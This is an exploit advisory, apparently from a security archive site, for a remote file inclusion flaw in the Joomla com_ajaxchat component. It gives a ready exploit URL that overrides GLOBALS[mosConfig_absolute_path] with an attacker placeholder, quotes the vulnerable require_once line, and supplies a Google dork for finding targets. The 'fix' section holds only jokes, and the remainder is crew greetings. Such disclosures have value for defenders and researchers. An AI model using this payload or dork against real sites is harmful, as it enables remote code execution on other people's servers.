Joomla Component com_ajaxchat Remote File Include vulnerability

2009.10.28
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################################################################# ## Joomla Component com_ajaxchat Remote File Include vulnerability ## ## Author : kaMtiEz (kamzcrew@gmail.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : September 27, 2009 ## ############################################################################################################# # Hello My Name Is : ## # __ _____ __ ._____________ ## # | | _______ / \_/ |_|__\_ _____/_______ ## # | |/ /\__ \ / \ / \ __\ || __)_\___ / ## # | < / __ \_/ Y \ | | || \/ / ## # |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ## # \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ## ############################################################################################################# [ Software Information ] [+] Vendor : http://www.fijiwebdesign.com/ [+] Download : http://www.fijiwebdesign.com/ [+] version : 1.0 - [+] Vulnerability : RFI [+] price : $49.95 [+] Dork : inurl:"com_ajaxchat" [+] Location : INDONESIA ############################################################################################################# [ Vulnerable File ] http://127.0.0.1/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L] [ BUG IN ] ajcuser.php error in line 7 // include our comprofiler class require_once($GLOBALS['mosConfig_absolute_path'].'/components/com_ajaxchat/plugins/plugin.user.php'); [ FIX ] Tukulesto said : ask to Aurakasih .. lol kaMtiEz said : tanya ama AuraKasih .. hha M3Nw5 said : takon Karo AuraKasih .. hha Arianom Said : coba kau tanya aura kasih lae Joke.. ;) ############################################################################################################# [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW [+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h [+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz [+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!! [ NOTE ] [+] makasih buad babe and enyak .... muach .. [+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha [+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top